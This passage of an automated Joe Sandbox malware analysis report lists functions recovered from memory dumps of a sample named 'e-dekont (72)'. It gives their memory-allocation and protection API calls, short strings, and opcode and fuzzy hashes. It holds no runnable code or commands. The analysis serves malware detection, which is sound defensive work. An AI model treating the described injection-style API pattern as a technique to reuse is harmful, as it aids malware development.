                                                                • Instruction Fuzzy Hash: 0A2115B1C002099FDB10DFAAC944BEEFBF5EF48320F10842AD529A7250CB79A544CFA1
                                                                Function 06CFDDF0 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • VirtualProtect.KERNEL32(?,?,?,?), ref: 06CFDE64
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052918142.0000000006CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6cf0000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID: ProtectVirtual
                                                                • String ID:
                                                                • API String ID: 544645111-0
                                                                • Opcode ID: 61d95a59a04302ebb7e124ca2c5b1a96d6638f680df934108458a924f76bbcdb
                                                                • Instruction ID: 7e76568baba6d2e33046b9130223ecf52948ff0f9bc4f2605502feebca885f27
                                                                • Opcode Fuzzy Hash: 61d95a59a04302ebb7e124ca2c5b1a96d6638f680df934108458a924f76bbcdb
                                                                • Instruction Fuzzy Hash: 7D11F4B1D002099FCB10DFAAC944AAFFBF5FF58320F10842AD519A7250CB79A944CFA1
                                                                Function 06C8651B Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06C8658E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052729526.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c80000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID: AllocVirtual
                                                                • String ID:
                                                                • API String ID: 4275171209-0
                                                                • Opcode ID: 17bb724546acdd497bfca220b97e822c284da0356409a99e667b0d15d5534399
                                                                • Instruction ID: 06bd82531d9c24f9fe118eaa786a52a834bf9a37a39428b601bc974c884e9427
                                                                • Opcode Fuzzy Hash: 17bb724546acdd497bfca220b97e822c284da0356409a99e667b0d15d5534399
                                                                • Instruction Fuzzy Hash: 7A1126718002499FCB20DFAAC845AEFFFF5EF48324F208819E559A7250CB79A544CFA0
                                                                Function 06AD2036 Relevance: 1.6, Strings: 1, Instructions: 304COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052132724.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6ad0000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Hnq
                                                                • API String ID: 0-2896580000
                                                                • Opcode ID: 184951879426d7dbe3482d6122736649a7a686295ed8c89dfdd02bb2f8157f52
                                                                • Instruction ID: 2d6e5507509f0ef56c661cb8cd9191630989a0e6bb1a7ead5d6a0b97f133a5fe
                                                                • Opcode Fuzzy Hash: 184951879426d7dbe3482d6122736649a7a686295ed8c89dfdd02bb2f8157f52
                                                                • Instruction Fuzzy Hash: C9D12034A01209DFCB44EFA4E5949ADBBB2FF89310F118569E512AB365DF30ED46CB90
                                                                Function 06C86520 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06C8658E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052729526.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c80000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID: AllocVirtual
                                                                • String ID:
                                                                • API String ID: 4275171209-0
                                                                • Opcode ID: 2f84c34a0b4249eba8927739d765a5a164fe4a980eaca3c616a63cc81f0a7640
                                                                • Instruction ID: 756c38bf8a2ed67d5a5a33f536d1359d96b79563cb96f87eebd224a0852cc7fd
                                                                • Opcode Fuzzy Hash: 2f84c34a0b4249eba8927739d765a5a164fe4a980eaca3c616a63cc81f0a7640
                                                                • Instruction Fuzzy Hash: 701137718002499FCB20DFAAC844AEFBFF5EF48324F108819E519A7250CB79A540CFA0
                                                                Function 06ADBDCD Relevance: 1.5, Strings: 1, Instructions: 260COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052132724.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6ad0000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: PHjq
                                                                • API String ID: 0-751881793
                                                                • Opcode ID: c88aff34fac9485ce9e49cb58189840740d83f365441f543a2e581e910467b2d
                                                                • Instruction ID: 4c1132635824e6a5ca916c72de1c2b4afd178c328b9eaf83962f1175339d62d9
                                                                • Opcode Fuzzy Hash: c88aff34fac9485ce9e49cb58189840740d83f365441f543a2e581e910467b2d
                                                                • Instruction Fuzzy Hash: 57C12A74E04218CFEBA0EF69C854B9DBBF2FB4A304F6081A9D50AAB354CB345985CF51
                                                                Function 06ADB063 Relevance: 1.5, Strings: 1, Instructions: 242COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052132724.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6ad0000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: f2kI
                                                                • API String ID: 0-2448362853
                                                                • Opcode ID: b261923a7445ef36f237169536b8ce6a3db5f0a6e10b9885c4e7cab4926c3a07
                                                                • Instruction ID: 29c904fda57a373007c16d561d4c8eb5b019db9b1978d9d253ccfa740123271a
                                                                • Opcode Fuzzy Hash: b261923a7445ef36f237169536b8ce6a3db5f0a6e10b9885c4e7cab4926c3a07
                                                                • Instruction Fuzzy Hash: 7BB138B4A05258CFDB90EFA5C894BDDBBF1FB5A300F1080AAD50AAB395CB345984CF51
                                                                Function 06C3DCB8 Relevance: 1.5, Strings: 1, Instructions: 230COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052649873.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c30000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'jq
                                                                • API String ID: 0-3676250632
                                                                • Opcode ID: 8cf3bb1e1faadf8724df566df812116c29c2a46ba2bfc54ff2d3043f626de0a9
                                                                • Instruction ID: 6a32906f4b49b512304b0d4cecae9baa93a6d85f553dfcb8f1661c61104af151
                                                                • Opcode Fuzzy Hash: 8cf3bb1e1faadf8724df566df812116c29c2a46ba2bfc54ff2d3043f626de0a9
                                                                • Instruction Fuzzy Hash: FFA1DA34A10218DFCB44EFA4D994AADBBB2FF89300F558159E506AB365DF70AD42CB90
                                                                Function 06AD2725 Relevance: 1.4, Strings: 1, Instructions: 197COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052132724.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6ad0000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (nq
                                                                • API String ID: 0-2756854522
                                                                • Opcode ID: 2ed54799a7438c461622a6cd48ed21113dc85119f8ab401d1da8cc87b75b703d
                                                                • Instruction ID: 273cac93f6e9b29d19e12bffe9f7f352c41e443dc2d94f4267e62ab3fb64df3b
                                                                • Opcode Fuzzy Hash: 2ed54799a7438c461622a6cd48ed21113dc85119f8ab401d1da8cc87b75b703d
                                                                • Instruction Fuzzy Hash: 47813935B102149FCB85EF64D894AAD7BB2FF89710B1580A9E5169F372CB31DD42CB90
                                                                Function 06AD43C8 Relevance: 1.4, Strings: 1, Instructions: 188COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052132724.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6ad0000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (nq
                                                                • API String ID: 0-2756854522
                                                                • Opcode ID: 38dc3ab03df5e3550caafadae42231f2e93307a19a0ef7131d5e366010ef6e30
                                                                • Instruction ID: c3baff781a757331988c3c9d9a2ab849417ee90e5045e7ac456c55396cbb46ee
                                                                • Opcode Fuzzy Hash: 38dc3ab03df5e3550caafadae42231f2e93307a19a0ef7131d5e366010ef6e30
                                                                • Instruction Fuzzy Hash: 51716634B006148FCB84EF64C9A4AAEB7B2FF89300F508569D5179B3A4DF74AD46CB91
                                                                Function 02E1D018 Relevance: 1.4, Strings: 1, Instructions: 166COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2041545680.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e10000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: TJoq
                                                                • API String ID: 0-3712055613
                                                                • Opcode ID: d3e52621cb41f7d2fc1cda01f91b653972ce7ddc4d8e8760c71b5df01c9dd598
                                                                • Instruction ID: 6d7745615c6554b9870e188151734eaf2659840eec6b6cc9009ead380b8d0d5f
                                                                • Opcode Fuzzy Hash: d3e52621cb41f7d2fc1cda01f91b653972ce7ddc4d8e8760c71b5df01c9dd598
                                                                • Instruction Fuzzy Hash: 5E71E5B8E052089FCB04EFA9D8586DDBBB2FB99301F20812ADA15A7358DB345D46CF51
                                                                Function 06C34830 Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052649873.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c30000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (nq
                                                                • API String ID: 0-2756854522
                                                                • Opcode ID: fca1926440509895001f7b4d1792b8c2ce8a69d57e640ecdc47525453d07bc22
                                                                • Instruction ID: 9fe92939744aa9dbdfc0abfa48b2f3116b4a047ca42ec396e958cf1bf1dc601f
                                                                • Opcode Fuzzy Hash: fca1926440509895001f7b4d1792b8c2ce8a69d57e640ecdc47525453d07bc22
                                                                • Instruction Fuzzy Hash: FC510431A006668FCB05CF68D48096AFBF5FF8A324B15C29AE565DB351C730E856CBD0
                                                                Function 06C33861 Relevance: 1.4, Strings: 1, Instructions: 156COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052649873.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c30000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: pnq
                                                                • API String ID: 0-1150273632
                                                                • Opcode ID: 7d0ac93ebee066df10f62e684dc87518fedfe9893020d28c6702aebf17d60302
                                                                • Instruction ID: 712225eda0c3f963cd4b3b061bc0eb1c96522c5bd64824e91e835118029b66c0
                                                                • Opcode Fuzzy Hash: 7d0ac93ebee066df10f62e684dc87518fedfe9893020d28c6702aebf17d60302
                                                                • Instruction Fuzzy Hash: D5514B76600110AFCB469FA8DD14D6A7FB7FF8D31471A8099E2098B276D736CC21EB91
                                                                Function 06C33870 Relevance: 1.4, Strings: 1, Instructions: 155COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052649873.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c30000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: pnq
                                                                • API String ID: 0-1150273632
                                                                • Opcode ID: 51ee4bbb6e7c8a03fa0e35e96f774e4f492e3cd442d51259454c945858ddbfa2
                                                                • Instruction ID: dfb92ded068596d71f068d833b9493509aafe7ca25805d68331b9287db5d067c
                                                                • Opcode Fuzzy Hash: 51ee4bbb6e7c8a03fa0e35e96f774e4f492e3cd442d51259454c945858ddbfa2
                                                                • Instruction Fuzzy Hash: 03515C76600104AFCB459FA8C914D6A7FB7FF8C31071980A8E2098B376DB36CC22DB91
                                                                Function 06AD1588 Relevance: 1.4, Strings: 1, Instructions: 134COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052132724.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6ad0000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'jq
                                                                • API String ID: 0-3676250632
                                                                • Opcode ID: c3166b2e86d120f372ca9894f732ffe5bf81489364eaa4b2ec25784677663121
                                                                • Instruction ID: 4ba99b8a4eff197ec5bf2ce8d54f5eab03dd7a9f7c2c7ab8e45051fe699a0679
                                                                • Opcode Fuzzy Hash: c3166b2e86d120f372ca9894f732ffe5bf81489364eaa4b2ec25784677663121
                                                                • Instruction Fuzzy Hash: 4F416230B106248FCB84AB64D854AAEB7BBEFC9600F10401AD413AB364CF74AC46DB91
                                                                Function 06AD5CD1 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052132724.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6ad0000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (nq
                                                                • API String ID: 0-2756854522
                                                                • Opcode ID: ba86136d5d1755b9adeaf25ea8351fbc98a4c337084b391a0a40b7937d2eeb6a
                                                                • Instruction ID: ab7a97f64f8c872b4444aea2778e04463870796a5efd21a9d8b3a0d11a43adb6
                                                                • Opcode Fuzzy Hash: ba86136d5d1755b9adeaf25ea8351fbc98a4c337084b391a0a40b7937d2eeb6a
                                                                • Instruction Fuzzy Hash: F1418C75F006158FCB64DF6998545AEBBF2FFC8210B14896ED95AD7B40DB30A801CBA1
                                                                Function 06AD0F89 Relevance: 1.4, Strings: 1, Instructions: 111COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052132724.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6ad0000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'jq
                                                                • API String ID: 0-3676250632
                                                                • Opcode ID: d80a7e90be5da1485a9796488ad3d3a99652523a30b869775d64c523be7951c5
                                                                • Instruction ID: 63f31f5888a8f96a0e4f7473cf103e8ecdb5c34ad10d31c153d3abebae86af86
                                                                • Opcode Fuzzy Hash: d80a7e90be5da1485a9796488ad3d3a99652523a30b869775d64c523be7951c5
                                                                • Instruction Fuzzy Hash: 1E314A753406109FD348EB29D958F2A77EAAFC9710F104568E60A8F3A5CE75EC42CBA0
                                                                Function 06AD0F90 Relevance: 1.4, Strings: 1, Instructions: 109COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052132724.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6ad0000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'jq
                                                                • API String ID: 0-3676250632
                                                                • Opcode ID: f89cd60d24b3f87e4ecbf0921a3cb2361ec52b16570171dcc9df669656ca7b50
                                                                • Instruction ID: b6fe59055b7dd56331c8e378a0e590b875afb2d99d1dbeef6f47fb8df5b14623
                                                                • Opcode Fuzzy Hash: f89cd60d24b3f87e4ecbf0921a3cb2361ec52b16570171dcc9df669656ca7b50
                                                                • Instruction Fuzzy Hash: 4B314B753406149FD348EB29D964F2A77EABFC9710F104568E60A8F3A5CE75EC42CBA0
                                                                Function 06C3CD38 Relevance: 1.4, Strings: 1, Instructions: 107COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052649873.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c30000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'jq
                                                                • API String ID: 0-3676250632
                                                                • Opcode ID: 750efbe9c4593721f22d3cc3763ba631ec41a11ebb66467033c3681ef1ba2a4a
                                                                • Instruction ID: 8e45702b031c70675fb6b83c5d85f21ea3031a61fd44b2dd358b6e92b79a6d91
                                                                • Opcode Fuzzy Hash: 750efbe9c4593721f22d3cc3763ba631ec41a11ebb66467033c3681ef1ba2a4a
                                                                • Instruction Fuzzy Hash: 2A31AF317002149FCB44AF64E85499EBFB7FF89310B14416AEA06AB365DE71EC52CBA0
                                                                Function 06AD42A8 Relevance: 1.3, Strings: 1, Instructions: 87COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052132724.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6ad0000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Hnq
                                                                • API String ID: 0-2896580000
                                                                • Opcode ID: 1c67b7ec2b2dc993a67902e460143614cc077735ea509b3b562c51fa067a1bac
                                                                • Instruction ID: 5c05d9a2908db8426c1594811a048c5a2aef88a31970c670b6e618c97e3a7a37
                                                                • Opcode Fuzzy Hash: 1c67b7ec2b2dc993a67902e460143614cc077735ea509b3b562c51fa067a1bac
                                                                • Instruction Fuzzy Hash: 5F317C74B046108FC794DF68C95496ABBF6EF89710B5584A9E106CB3B6DA31EC02CBA1
                                                                Function 06AD1581 Relevance: 1.3, Strings: 1, Instructions: 84COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052132724.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6ad0000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'jq
                                                                • API String ID: 0-3676250632
                                                                • Opcode ID: 3e7f3daffc9ed47a7d69170e67c01e0887b1eb4ef410aeb21c4fb3834914b0c0
                                                                • Instruction ID: 3ed3cce11a85a6e1ce58b5c8a780abed423444b3d68b1de5fa8abf74133e9986
                                                                • Opcode Fuzzy Hash: 3e7f3daffc9ed47a7d69170e67c01e0887b1eb4ef410aeb21c4fb3834914b0c0
                                                                • Instruction Fuzzy Hash: 75218270B002159BDB946B65C8546BEBAABAFC9700F10402EE417AB3A5CE745C42DB91
                                                                Function 06AA1E34 Relevance: 1.3, Strings: 1, Instructions: 74COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2051997153.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6aa0000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'jq
                                                                • API String ID: 0-3676250632
                                                                • Opcode ID: f2b4f4cca7af880846bc8b189822b14269902a88eda2abaee265c51ddb48df7b
                                                                • Instruction ID: 46e4a9c22dfedfcf96697e0f7630d453445611a500f7665b2dc2cfd4ad354770
                                                                • Opcode Fuzzy Hash: f2b4f4cca7af880846bc8b189822b14269902a88eda2abaee265c51ddb48df7b
                                                                • Instruction Fuzzy Hash: 6E317630D09309DFEB69EFA5C4142BEBBB2EF86301F14846AC151AB292C7341E45CF91
                                                                Function 06C38450 Relevance: 1.3, Strings: 1, Instructions: 72COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052649873.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c30000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: p<jq
                                                                • API String ID: 0-3743064563
                                                                • Opcode ID: d13fb5fb7a826991f13c44aaff1f93812365d0fdee64504877fcdb683079ea47
                                                                • Instruction ID: 374439d38fbfaa6ed46cc8342ae95a91d9967bfbe08e643136fcce02fd7c0af2
                                                                • Opcode Fuzzy Hash: d13fb5fb7a826991f13c44aaff1f93812365d0fdee64504877fcdb683079ea47
                                                                • Instruction Fuzzy Hash: C9219F713051549FCB51CF6AC854AAA7FFABF8E210B19449AF945CB371CA35DC40CB20
                                                                Function 06C38460 Relevance: 1.3, Strings: 1, Instructions: 72COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052649873.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c30000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: p<jq
                                                                • API String ID: 0-3743064563
                                                                • Opcode ID: b8b4ca957ece85df73b75332a24f89a3a00b21284b19ad655dbeea00326770bc
                                                                • Instruction ID: 0d09d57cc58707a38d53e2a4c24bfb8efa79fbfb443e0f2eb3fd5de6e52d28b8
                                                                • Opcode Fuzzy Hash: b8b4ca957ece85df73b75332a24f89a3a00b21284b19ad655dbeea00326770bc
                                                                • Instruction Fuzzy Hash: 7F216D713001649FDB51CF2AC850AAA7BEABF89300F194499FD55CB3A1CA35DD50CB60
                                                                Function 06CFEE68 Relevance: 1.3, APIs: 1, Instructions: 52memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • VirtualAlloc.KERNEL32(?,?,?,?), ref: 06CFEED3
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052918142.0000000006CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6cf0000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID: AllocVirtual
                                                                • String ID:
                                                                • API String ID: 4275171209-0
                                                                • Opcode ID: 0cf4967131d795b0f1c44d2a1d5948899097f6bcbb6614f99bfedc52cb4b4ddc
                                                                • Instruction ID: 693a0c47912621b1c30c2be770d5dc01d7d61a003b0e6e3f06ed1176169c7f52
                                                                • Opcode Fuzzy Hash: 0cf4967131d795b0f1c44d2a1d5948899097f6bcbb6614f99bfedc52cb4b4ddc
                                                                • Instruction Fuzzy Hash: EB1107B59002499FCB20DFAAC845BEFFBF5EF48320F148419D519A7250CB79A544CBA0
                                                                Function 06AD4218 Relevance: 1.3, Strings: 1, Instructions: 51COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052132724.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6ad0000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (nq
                                                                • API String ID: 0-2756854522
                                                                • Opcode ID: 61c8c20ac3e25a2374d393cc4dce1cae110b86d7740799c5b23c297952dca1ab
                                                                • Instruction ID: 705845596818fc7890a2e383c64517fd8c17299f2838210f860909e9f5c78051
                                                                • Opcode Fuzzy Hash: 61c8c20ac3e25a2374d393cc4dce1cae110b86d7740799c5b23c297952dca1ab
                                                                • Instruction Fuzzy Hash: BB01D42170A2901FD7966B78583467F3AAA9FC7550F1940ABD452CB3C2CD298D06C3E2
                                                                Function 06F93CD2 Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2053042203.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6f90000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: j
                                                                • API String ID: 0-2137352139
                                                                • Opcode ID: e85621e484f0fd35d2c265999be5c21796a8c70ece98425cdce3bc7a2f0576df
                                                                • Instruction ID: 8a17f4701cb300076a8e31d0d6af2671e325d3bd0faa0d8645b53ee2261dd74e
                                                                • Opcode Fuzzy Hash: e85621e484f0fd35d2c265999be5c21796a8c70ece98425cdce3bc7a2f0576df
                                                                • Instruction Fuzzy Hash: 99116674A04229CFDBA4DF58C898AE9B3F1FB5A305F1150EAD509A3694CB344EC9CF51
                                                                Function 05994892 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2050688982.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_5990000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: &
                                                                • API String ID: 0-1010288
                                                                • Opcode ID: 3b70dd5a79824d031bea21704d3524adc77f3b53593cdda2672ac070fe286e13
                                                                • Instruction ID: db19872e77537e29a46c7a28f95fd5f84a87843cd87ab7d5ba93ddad0ecbbe47
                                                                • Opcode Fuzzy Hash: 3b70dd5a79824d031bea21704d3524adc77f3b53593cdda2672ac070fe286e13
                                                                • Instruction Fuzzy Hash: CF01BDB4D06228CFCF65DFA4D848BDDBBB2BB19308F10819AA619A7350D7B45E81CF40
                                                                Function 05994E3A Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2050688982.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_5990000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: &
                                                                • API String ID: 0-1010288
                                                                • Opcode ID: 5e9bea29b3c14247cc3113802a12bb1e2a5c38428938a9f5143c8db91c3362e1
                                                                • Instruction ID: b0682fdf1edae75f2de6d9d54113d36aa41c07a1d72c14444f181aefdbc21aa5
                                                                • Opcode Fuzzy Hash: 5e9bea29b3c14247cc3113802a12bb1e2a5c38428938a9f5143c8db91c3362e1
                                                                • Instruction Fuzzy Hash: 4FF0FF78D02228CFCF65DF64D844BCDBBB2BB18304F10819AA619A7350C7B05E80CF40
                                                                Function 06C30513 Relevance: 1.3, Strings: 1, Instructions: 20COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052649873.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c30000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Tejq
                                                                • API String ID: 0-2468842661
                                                                • Opcode ID: 17b5a86fe3212f696a8ce9f19621aff7626562961951b51d4596fc146d8ceb63
                                                                • Instruction ID: 490748f1b01d263928e33718313231414b754b4d667b4c23d4814337581c58a8
                                                                • Opcode Fuzzy Hash: 17b5a86fe3212f696a8ce9f19621aff7626562961951b51d4596fc146d8ceb63
                                                                • Instruction Fuzzy Hash: 82F0D474A41219CBDB24DF24D994BEDB7B2BB58300F1041E99409A3344DB701E81CF50
                                                                Function 05994B78 Relevance: 1.3, Strings: 1, Instructions: 20COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2050688982.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_5990000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (
                                                                • API String ID: 0-3887548279
